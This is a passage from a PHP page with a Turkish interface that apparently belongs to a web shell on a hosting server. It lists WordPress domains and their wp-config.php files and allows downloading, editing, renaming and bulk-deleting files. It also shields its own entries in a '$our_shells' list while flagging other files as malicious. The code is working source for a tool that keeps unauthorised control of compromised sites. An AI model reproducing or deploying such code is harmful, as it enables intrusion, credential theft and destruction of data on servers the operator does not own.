?>')">İndir</button><button type="button" onclick="showRenameModal('<?php echo addslashes($plugin['path']); ?>','<?php echo addslashes($plugin['name']); ?>')">Adlandır</button><a href="?dir=<?php echo urlencode($plugin['path']); ?>" class="button">İncele</a></div></div> <?php endforeach; ?> </div></div> <?php endif; ?> <?php if($wp_domain_count > 0): ?> <div class="delete-section" style="border-left-color:#00a8ff;"> <div class="delete-title" onclick="toggleSection(this)" style="color:#00a8ff;">📊 WordPress Kurulu Domainler (<?php echo $wp_domain_count; ?> adet)<span class="toggle-arrow">▼</span></div> <div class="delete-body"><?php foreach($wp_domains_list as $wp): ?> <div class="row"><div class="checkbox-column"></div><div class="name">📁 <?php echo htmlspecialchars($wp['path']); ?><?php if($wp['has_wp_config']): ?><span class="wp-badge">wp-config.php</span><?php endif; ?></div><div><a href="?dir=<?php echo urlencode($wp['path']); ?>" class="button">📂 Aç</a></div></div> <?php endforeach; ?></div> </div> <?php endif; ?> <form method="post" onsubmit="bulkDeleteAjax(); return false;"> <input type="hidden" name="action" value="bulk_delete"> <input type="hidden" name="current_dir" value="<?php echo htmlspecialchars($current_dir); ?>"> <div class="list-header"><div><input type="checkbox" onclick="toggleAll(this)"> <strong>Tümünü Seç</strong></div><button type="submit" class="danger">🗑 Seçileni Sil</button></div> <h3>📁 Klasörler</h3> <?php foreach ($folders as $folder): $path = $current_dir.'/'.$folder; $is_protected = in_array($folder, $wordpress_core_dirs) || in_array($folder, $our_shells); ?> <div class="row <?php if($is_protected) echo 'protected'; ?>"> <div><input type="checkbox" name="bulk_delete[]" value="<?php echo htmlspecialchars($path); ?>" <?php if($is_protected) echo 'disabled'; ?>></div> <div class="name">📁 <a href="?dir=<?php echo urlencode($path); ?>"><?php echo htmlspecialchars($folder); ?></a><?php if(in_array($folder, $wordpress_core_dirs)): ?><span 
class="wp-badge">WORDPRESS</span><?php endif; ?></div> <div><button type="button" onclick="downloadFile('<?php echo addslashes($path); ?>')">📥 İndir</button></div> </div> <?php endforeach; ?> <h3>📄 Dosyalar</h3> <?php foreach ($files as $file): $path = $current_dir.'/'.$file; $editUrl = '?editf='.base64_encode($path).'&dir='.urlencode($current_dir); $is_protected = in_array($file, $protected_files) || in_array($file, $wordpress_core_files) || in_array($file, $our_shells); $is_malicious = false; if(!$is_protected && isset($_SESSION['malicious'])){ foreach($_SESSION['malicious'] as $m){ if($m['path']==$path){ $is_malicious=true; break; } } } $row_class = $is_protected ? 'protected' : ($is_malicious ? 'malicious' : ''); ?> <div class="row <?php echo $row_class; ?>"> <div><input type="checkbox" name="bulk_delete[]" value="<?php echo htmlspecialchars($path); ?>" <?php if($is_protected) echo 'disabled'; ?>></div> <div class="name">📄 <?php echo htmlspecialchars($file); ?><?php if($is_protected): ?><span class="protected-badge">KORUNAN</span><?php endif; ?><?php if($is_malicious): ?><span class="malicious-badge">ZARARLI</span><?php endif; ?></div> <div class="inline-controls"> <button type="button" onclick="downloadFile('<?php echo addslashes($path); ?>')">📥 İndir</button> <?php if(!$is_protected): ?><button type="button" onclick="showRenameModal('<?php echo addslashes($path); ?>','<?php echo addslashes($file); ?>')">✏️ Adlandır</button><?php endif; ?> <a class="button edit-btn" href="<?php echo $editUrl; ?>">✏️ Düzenle</a> </div> </div> <?php endforeach; ?> <div class="list-header"><div></div><button type="submit" class="danger">🗑 Seçileni Sil</button></div> </form> <div id="renameModal" class="modal"><div class="modal-content"> <h3>📝 Dosya/Klasör Adını Değiştir</h3> <form method="post"><input type="hidden" name="action" value="rename"><input type="hidden" name="old" id="rename_old"><input type="hidden" name="current_dir" value="<?php echo htmlspecialchars($current_dir); 
?>"><p style="margin-bottom:8px;">Yeni isim:</p><input type="text" name="new" id="rename_new" required style="width:100%; padding:10px; margin-bottom:15px; background:#1e272e; border:1px solid #40739e; color:#fff; border-radius:6px;"><div style="display:flex; gap:10px; justify-content:flex-end;"><button type="button" onclick="hideRenameModal()">İptal</button><button type="submit" class="success">Değiştir</button></div></form> </div></div> <?php if ($file_to_edit && file_exists($file_to_edit)): $is_protected = in_array(basename($file_to_edit), $protected_files) || in_array(basename($file_to_edit), $wordpress_core_files) || in_array(basename($file_to_edit), $our_shells); $file_content = htmlspecialchars(file_get_contents($file_to_edit)); $line_count = substr_count($file_content, "\n") + 1; ?> <hr> <div class="editor-container"> <div class="editor-header"><div class="editor-title">✏️ Düzenleniyor: <code><?php echo htmlspecialchars(basename($file_to_edit)); ?></code><span style="font-size:11px; color:#888; margin-left:10px;">(<?php echo number_format(filesize($file_to_edit)); ?> bytes, <?php echo $line_count; ?> satır)</span></div><div class="editor-buttons"><button type="button" class="copy-btn" onclick="copyToClipboard()">📋 Kopyala</button><a href="?dir=<?php echo urlencode($_GET['dir'] ?? $current_dir); ?>" class="button cancel-btn">✖️ İptal</a></div></div> <?php if($is_protected): ?><div class="warning-box">Bu dosya KORUNAN bir dosyadır! Düzenlemek sitenin çalışmasını bozabilir. Dikkatli olun!</div><?php endif; ?> <form id="editor-form" onsubmit="saveFile(); return false;"><textarea id="editor-content" name="content" class="editor-textarea" spellcheck="false"><?php echo $file_content; ?></textarea><input type="hidden" id="edit-file" name="file" value="<?php echo htmlspecialchars($file_to_edit); ?>"><input type="hidden" id="current-dir" name="current_dir" value="<?php echo htmlspecialchars($_GET['dir'] ?? 
$current_dir); ?>"><div class="editor-info"><div>📁 <span><?php echo htmlspecialchars($file_to_edit); ?></span></div><div>💾 Son değişiklik: <span><?php echo date('Y-m-d H:i:s', filemtime($file_to_edit)); ?></span></div><div><button type="submit" class="save-btn" style="background:#44bd32; color:#000; padding:6px 20px;">💾 KAYDET</button></div></div></form> </div> <?php endif; ?> <?php if(!empty($analysis)): ?> <hr><h3>🔍 Dosya Analizi: <?php echo htmlspecialchars(basename($analysis_file)); ?></h3> <div class="pre-box"><?php echo nl2br(htmlspecialchars($analysis)); ?></div> <?php endif; ?> <div class="stats"> <div class="stat-item"><div class="stat-value"><?php echo count($files); ?></div><div class="stat-label">Dosya</div></div> <div class="stat-item"><div class="stat-value"><?php echo count($folders); ?></div><div class="stat-label">Klasör</div></div> <div class="stat-item"><div class="stat-value"><?php echo count($malicious_files); ?></div><div class="stat-label">Zararlı</div></div> <div class="stat-item"><div class="stat-value"><?php echo count($our_shells); ?></div><div class="stat-label">Shell</div></div> <div class="stat-item"><div class="stat-value" style="color:#00a8ff;"><?php echo $wp_domain_count; ?></div><div class="stat-label">WordPress Domain</div></div> </div> </div> <div id="loading-overlay" class="loading-overlay"><div class="spinner"></div></div> </body> </html>